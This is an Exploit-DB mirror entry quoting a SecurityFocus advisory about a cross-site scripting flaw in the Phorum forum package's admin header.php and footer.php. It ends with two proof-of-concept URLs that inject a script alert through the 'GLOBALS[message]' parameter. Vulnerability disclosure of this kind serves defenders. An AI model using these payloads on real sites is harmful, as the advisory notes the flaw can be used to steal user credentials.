exploit-db-mirror/exploits/php/webapps/21461.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

11 lines
No EOL
691 B
Text

source: https://www.securityfocus.com/bid/4767/info
Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.
The 'header.php' and 'footer.php' components of Phorum do not santize the client-supplied value of the 'GLOBALS' parameter prior to output. As a result, script commands embedded in these variables will be executed by the client in the context of Phorum.
Attackers may exploit this vulnerability to obtain user credentials.
http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>